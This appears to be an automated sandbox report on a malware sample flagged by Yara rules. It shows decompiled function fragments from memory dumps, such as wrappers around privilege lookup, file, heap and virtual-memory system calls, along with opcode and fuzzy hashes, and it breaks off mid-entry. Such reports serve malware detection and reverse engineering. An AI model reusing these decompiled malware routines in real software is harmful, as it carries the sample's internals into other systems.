                                                                                    • Opcode ID: 7997dd6130d69d6a6cdf66612845a13fcb068ba07fa9f9ab66acc80c3af8de7a
                                                                                    • Instruction ID: c471a7a482c4acc8b97cc48f06a4835c8e75f01e11c13bfe5c3798fee8e62ae7
                                                                                    • Opcode Fuzzy Hash: 7997dd6130d69d6a6cdf66612845a13fcb068ba07fa9f9ab66acc80c3af8de7a
                                                                                    • Instruction Fuzzy Hash: A4F0E931E842243AE72056555C03FFAB7589B80B11F14457FFE44B92C2E6A96C0686E6
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 50%
                                                                                    			E00418621(void* __edx, intOrPtr* __esi, void* __eflags, int _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                                    				char _v117;
                                                                                    
                                                                                    				if(__eflags > 0) {
                                                                                    					asm("adc al, 0x50");
                                                                                    					_push(_a16);
                                                                                    					_push(_a12);
                                                                                    					return  *((intOrPtr*)( *__esi))();
                                                                                    				} else {
                                                                                    					0x2e296bd8();
                                                                                    					_t4 =  &_v117;
                                                                                    					 *_t4 = _v117 - __dl;
                                                                                    					__eflags =  *_t4;
                                                                                    					__ebp = __esp;
                                                                                    					__eax = _a4;
                                                                                    					__esi = _a4 + 0xc8c;
                                                                                    					__eax = E00418DC0(__edi, __eax, __esi,  *((intOrPtr*)(__eax + 0xa18)), 0, 0x46);
                                                                                    					__edx = _a16;
                                                                                    					__eax = _a12;
                                                                                    					__edx =  *__esi;
                                                                                    					__eax = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                                    					__esi = __esi;
                                                                                    					__ebp = __ebp;
                                                                                    					return __eax;
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LookupPrivilegeValue
                                                                                    • String ID:
                                                                                    • API String ID: 3899507212-0
                                                                                    • Opcode ID: f68e4ba5911c09c1a664b835add706f56c52f169149eeadc05de385caee06865
                                                                                    • Instruction ID: 65204f1e0b89d90fab1e4f0e6e35f8594f9b64f63a7785db3f21326e2eb3355a
                                                                                    • Opcode Fuzzy Hash: f68e4ba5911c09c1a664b835add706f56c52f169149eeadc05de385caee06865
                                                                                    • Instruction Fuzzy Hash: E9F0CDB22002086FDB24DFA5DC80EEB77ACEF88310F14864EF94D97201C934E9008BB4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00418630(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                                    				int _t10;
                                                                                    				void* _t15;
                                                                                    
                                                                                    				L00418DC0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                                                    				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                                    				return _t10;
                                                                                    			}

                                                                                    APIs
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000001.220049197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LookupPrivilegeValue
                                                                                    • String ID:
                                                                                    • API String ID: 3899507212-0
                                                                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                    • Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
                                                                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                    • Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E004184D0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                                    				char _t10;
                                                                                    				void* _t15;
                                                                                    
                                                                                    				_t3 = _a4 + 0xc74; // 0xc74
                                                                                    				L00418DC0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                                    				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                    				return _t10;
                                                                                    			}

                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000001.220049197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3298025750-0
                                                                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                    • Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
                                                                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                    • Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00418490(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                                                                    				void* _t10;
                                                                                    				void* _t15;
                                                                                    
                                                                                    				L00418DC0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                                                    				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                                                                    				return _t10;
                                                                                    			}

                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000001.220049197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                    • Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
                                                                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                    • Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00418510(intOrPtr _a4, int _a8) {
                                                                                    				void* _t10;
                                                                                    
                                                                                    				_t5 = _a4;
                                                                                    				L00418DC0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                                                    				ExitProcess(_a8);
                                                                                    			}

                                                                                    APIs
                                                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000001.220049197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExitProcess
                                                                                    • String ID:
                                                                                    • API String ID: 621844428-0
                                                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                    • Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
                                                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                    • Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 00b65bfc2546c7fb5e612b5a7eb139199c874b73aebd579c023b783b112b30e5
                                                                                    • Instruction ID: bec34b670d5326920ac72b5bb9364ddcc73b5106a9da09ff301e3e43f2837250
                                                                                    • Opcode Fuzzy Hash: 00b65bfc2546c7fb5e612b5a7eb139199c874b73aebd579c023b783b112b30e5
                                                                                    • Instruction Fuzzy Hash: 66B09B729014C5C5D711E7604608F177A40F7E0741F16C1A6D1160645A4778C491F6B5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Non-executed Functions

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 13aeca26aac1350e951a3d1d0c9e7698136053dbe26938b711397683e8717957
                                                                                    • Instruction ID: b610fec1819a9ef3e8eb13ccf47b36190989a9e05c45c9668b62d05e56b8b391
                                                                                    • Opcode Fuzzy Hash: 13aeca26aac1350e951a3d1d0c9e7698136053dbe26938b711397683e8717957
                                                                                    • Instruction Fuzzy Hash: 45900272301000529600B6999804E4A4245D7F0341B51D06AE4004559C85948871E661
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2b162f70d94ad3e6a1319187714b5b8fbb560203fcdeff0e2cea3a9d79559ad2
                                                                                    • Instruction ID: 788ead8f971dbd97a7b350aff8d6c848248400e226522c855890a4550222a25e
                                                                                    • Opcode Fuzzy Hash: 2b162f70d94ad3e6a1319187714b5b8fbb560203fcdeff0e2cea3a9d79559ad2
                                                                                    • Instruction Fuzzy Hash: 1390026220504442D20075599408E060145D7D0345F51D066E105459ADC6758861F671
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8951c40522bb024f6abbbf45f6344cc39ef39280e1c7d746cf4bb763255f6fd6
                                                                                    • Instruction ID: 6c6d5667295ffc58270c185cfb94d1abf2c7a25e7164e03c6b7c77f90a975547
                                                                                    • Opcode Fuzzy Hash: 8951c40522bb024f6abbbf45f6344cc39ef39280e1c7d746cf4bb763255f6fd6
                                                                                    • Instruction Fuzzy Hash: 1390027620504442D60075599804E870145D7D0345F51D466E041459DD86948871F661
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: af351b3dc3819f4b7935b9f08087173f95f00b7745675f2bb7c01b9fff801f31
                                                                                    • Instruction ID: e6f36cbfac4211b5b5c3108a56f94ed8490fb4c3c05dfa474a64df20f0018d37
                                                                                    • Opcode Fuzzy Hash: af351b3dc3819f4b7935b9f08087173f95f00b7745675f2bb7c01b9fff801f31
                                                                                    • Instruction Fuzzy Hash: 2290027220100403D20071599508B070145D7D0341F51D466E041455DDD6968861F661
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                    • Instruction ID: 93286251d1492551862018ef1bd2f6fe4a6ac5a190a981ebb2e9fe772a03b3ef
                                                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                    • Instruction Fuzzy Hash:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 53%
                                                                                    			E00BCFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                    				void* _t7;
                                                                                    				intOrPtr _t9;
                                                                                    				intOrPtr _t10;
                                                                                    				intOrPtr* _t12;
                                                                                    				intOrPtr* _t13;
                                                                                    				intOrPtr _t14;
                                                                                    				intOrPtr* _t15;
                                                                                    
                                                                                    				_t13 = __edx;                                                                                                                              // 0x00bcfdda
                                                                                    				_push(_a4);                                                                                                                                // 0x00bcfde2
                                                                                    				_t14 =  *[fs:0x18];                                                                                                                        // 0x00bcfde5
                                                                                    				_t15 = _t12;                                                                                                                               // 0x00bcfdec
                                                                                    				_t7 = E00B7CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);                                                              // 0x00bcfdfa
                                                                                    				_push(_t13);                                                                                                                               // 0x00bcfdff
                                                                                    				E00BC5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);                                                           // 0x00bcfe0a
                                                                                    				_t9 =  *_t15;                                                                                                                              // 0x00bcfe0f
                                                                                    				if(_t9 == 0xffffffff) {                                                                                                                    // 0x00bcfe17
                                                                                    					_t10 = 0;                                                                                                                                  // 0x00bcfe1e
                                                                                    				} else {                                                                                                                                   // 0x00bcfe19
                                                                                    					_t10 =  *((intOrPtr*)(_t9 + 0x14));                                                                                                        // 0x00bcfe19
                                                                                    				}                                                                                                                                          // 0x00bcfe19
                                                                                    				_push(_t10);                                                                                                                               // 0x00bcfe20
                                                                                    				_push(_t15);                                                                                                                               // 0x00bcfe21
                                                                                    				_push( *((intOrPtr*)(_t15 + 0xc)));                                                                                                        // 0x00bcfe22
                                                                                    				_push( *((intOrPtr*)(_t14 + 0x24)));                                                                                                       // 0x00bcfe25
                                                                                    				return E00BC5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20))); // 0x00bcfe40
                                                                                    			}

                                                                                    APIs
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BCFDFA
                                                                                    Strings
                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00BCFE2B
                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00BCFE01
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                    • API String ID: 885266447-3903918235
                                                                                    • Opcode ID: 5ae738f945400c9907efdafe51e8bb4650d01f73cfddbaa82117bf42a4410f9e
                                                                                    • Instruction ID: 0214fcb5e07229ca3d02f8ab58e5e9592c6cf607fc6c1b2337d6afa1075feeed
                                                                                    • Opcode Fuzzy Hash: 5ae738f945400c9907efdafe51e8bb4650d01f73cfddbaa82117bf42a4410f9e
                                                                                    • Instruction Fuzzy Hash: B0F0F632200602BFD6241A45DC06F33BF9AEB44731F244399F628561E2DA62FCA096F0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Executed Functions

                                                                                    APIs
                                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00DA3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00DA3B97,007A002E,00000000,00000060,00000000,00000000), ref: 00DA820D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID: .z`
                                                                                    • API String ID: 823142352-1441809116
                                                                                    • Opcode ID: 74128cedc668c003c8c5871bfcd3d55ae743e2caa364d32285d8391725f24b91
                                                                                    • Instruction ID: 8e7e231b4691863d6bbdc6f37e1a6cddfe60748f323f12faf3c695b102cd0169
                                                                                    • Opcode Fuzzy Hash: 74128cedc668c003c8c5871bfcd3d55ae743e2caa364d32285d8391725f24b91
                                                                                    • Instruction Fuzzy Hash: F511A2B2604209ABDB18DF98DC85DEB77ADEF8C750B158648FA5D97241CA30E8118BA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00DA3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00DA3B97,007A002E,00000000,00000060,00000000,00000000), ref: 00DA820D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID: .z`
                                                                                    • API String ID: 823142352-1441809116
                                                                                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                    • Instruction ID: 82ba4e47cb61f76968030c898f57c2195babc8eab9e7b3769ea7caa6205f9137
                                                                                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                    • Instruction Fuzzy Hash: 9DF0B6B2200108AFCB08CF88DC85DEB77ADAF8C754F158248FA0D97241C630E8118BA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00DA3B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00DA3B97,007A002E,00000000,00000060,00000000,00000000), ref: 00DA820D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID: .z`
                                                                                    • API String ID: 823142352-1441809116
                                                                                    • Opcode ID: 8b0d11924ab6892fae6f044f30e74a5d3f21072cb3ed0bb76370e21e93a43356
                                                                                    • Instruction ID: 970704d3aadf31a01e81693ea3b21e45a7e363fab2e7e7af3e33c534f1ff5714
                                                                                    • Opcode Fuzzy Hash: 8b0d11924ab6892fae6f044f30e74a5d3f21072cb3ed0bb76370e21e93a43356
                                                                                    • Instruction Fuzzy Hash: E601AFB2211108AFCB48CF88DC95EEB77A9EF8C754F158248FE1997241DA30E8518BA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • NtReadFile.NTDLL(00DA3D52,5E972F59,FFFFFFFF,00DA3A11,?,?,00DA3D52,?,00DA3A11,FFFFFFFF,5E972F59,00DA3D52,?,00000000), ref: 00DA82B5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID:
                                                                                    • API String ID: 2738559852-0
                                                                                    • Opcode ID: 2d7d89b025c2b5a9e824c593b4c59b720c1709a6c93e724328171e034f9531c6
                                                                                    • Instruction ID: 29a14dc761a913ebc66f40bf5b3acf92613f356e6f8b8326a7eabd83cd7ad500
                                                                                    • Opcode Fuzzy Hash: 2d7d89b025c2b5a9e824c593b4c59b720c1709a6c93e724328171e034f9531c6
                                                                                    • Instruction Fuzzy Hash: EDF0E7B2200108AFCB08DF89DC80EEB77ADAF8C714F158258BE1D97241CA30E8118BA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • NtReadFile.NTDLL(00DA3D52,5E972F59,FFFFFFFF,00DA3A11,?,?,00DA3D52,?,00DA3A11,FFFFFFFF,5E972F59,00DA3D52,?,00000000), ref: 00DA82B5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID:
                                                                                    • API String ID: 2738559852-0
                                                                                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                    • Instruction ID: 8cba19b7eab76473ac1c477b4edcef7a8b393131b8654838b3c243eb040561df
                                                                                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                    • Instruction Fuzzy Hash: BCF0A4B2200208AFCB14DF99DC81EEB77ADEF8C754F158648BE1D97241DA30E8118BA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00D92D11,00002000,00003000,00000004), ref: 00DA83D9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateMemoryVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 2167126740-0
                                                                                    • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                    • Instruction ID: 84de91a3474586326083c9f6a516bf06fffd2f0c225c64397178ffa78fcea66e
                                                                                    • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                    • Instruction Fuzzy Hash: 4CF015B2200208AFCB14DF89CC81EAB77ADEF88750F118548FE0897241CA30F810CBB0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • NtClose.NTDLL(00DA3D30,?,?,00DA3D30,00000000,FFFFFFFF), ref: 00DA8315
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: false
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID:
                                                                                    • API String ID: 3535843008-0
                                                                                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                    • Instruction ID: 04b3762e50164f20b81f98c76816739ba788542d5d0706b92eaeecb5df7d0233
                                                                                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                    • Instruction Fuzzy Hash: A8D012756002146BD710EF98CC45E97775CEF44750F154455BA185B242C930F90086E0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: true
                                                                                    • Associated: 00000007.00000002.486517640.000000000500B000.00000040.00000001.sdmp
                                                                                    • Associated: 00000007.00000002.486536379.000000000500F000.00000040.00000001.sdmp
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 28c5f80194601eedb59e59d3eb38f4baba82764954364c8eb462f3dd979b9373
                                                                                    • Instruction ID: cc10bcd187f0ebed39f1f8d071cfd541c3c3d40874c9479fa232d01f17f03a05
                                                                                    • Opcode Fuzzy Hash: 28c5f80194601eedb59e59d3eb38f4baba82764954364c8eb462f3dd979b9373
                                                                                    • Instruction Fuzzy Hash: 339002A1342004036105715A4414616400A97E0245B51C021E1016590DC965D8927165
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: true
• Associated: 00000007.00000002.486517640.000000000500B000.00000040.00000001.sdmp
• Associated: 00000007.00000002.486536379.000000000500F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 7f60291e23b279a3c78623ad34332524ef7b85bbee5732e685f6fbc3d387d357
• Instruction ID: 7633d909570ba3d72822e0c45f45917f50c9eade8c572814697eeec8c83e78e6
• Opcode Fuzzy Hash: 7f60291e23b279a3c78623ad34332524ef7b85bbee5732e685f6fbc3d387d357
• Instruction Fuzzy Hash: 33900265351004032105A55A0704507004697D5395351C021F1017550CDA61D8626161
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: true
• Associated: 00000007.00000002.486517640.000000000500B000.00000040.00000001.sdmp
• Associated: 00000007.00000002.486536379.000000000500F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 6c534c1deedee24449d70c6756d9f30c3d61b5a533403f4c4f2fd8daf9990540
• Instruction ID: afb07667baef6a4ea64e7f5b3a4bf5471b90ec247d3679525863fc1c22ed4a33
• Opcode Fuzzy Hash: 6c534c1deedee24449d70c6756d9f30c3d61b5a533403f4c4f2fd8daf9990540
• Instruction Fuzzy Hash: 7F90027134108C02F110615A840474A000597D0345F55C411A4426658DCAD5D8927161
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: true
• Associated: 00000007.00000002.486517640.000000000500B000.00000040.00000001.sdmp
• Associated: 00000007.00000002.486536379.000000000500F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 16231773c919748490d7d32a0864da4967a2e6581355dbc6fc8f60796c5ec312
• Instruction ID: ade336944d912d0e36553546e67d1cf768ef26db9c576161839c983889e2d272
• Opcode Fuzzy Hash: 16231773c919748490d7d32a0864da4967a2e6581355dbc6fc8f60796c5ec312
• Instruction Fuzzy Hash: 8790027134100C42F100615A4404B46000597E0345F51C016A0126654DCA55D8527561
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: true
• Associated: 00000007.00000002.486517640.000000000500B000.00000040.00000001.sdmp
• Associated: 00000007.00000002.486536379.000000000500F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 827cc3db9b0c50f9310cb952addfb32decb336773abfc1c58a34b04bece45142
• Instruction ID: 51a0e4e3a2e90c0812ad4588cdd95788c5168b70407f89e9dfa8e79aeaf6f69a
• Opcode Fuzzy Hash: 827cc3db9b0c50f9310cb952addfb32decb336773abfc1c58a34b04bece45142
• Instruction Fuzzy Hash: 4D90027134100C02F180715A440464A000597D1345F91C015A0027654DCE55DA5A77E1
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.485807292.0000000004EF0000.00000040.00000001.sdmp, Offset: 04EF0000, based on PE: true
• Associated: 00000007.00000002.486517640.000000000500B000.00000040.00000001.sdmp
• Associated: 00000007.00000002.486536379.000000000500F000.00000040.00000001.sdmp
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 8fd4ec5333189cee48dc5cd7e8cf2d5c581f12045e3b0da1303ead89e86a9d43
• Instruction ID: 95a555f4ddf6cd8c9e404bb0b1d31e81be4aa0162ad66f3669243b5e0c731d5a
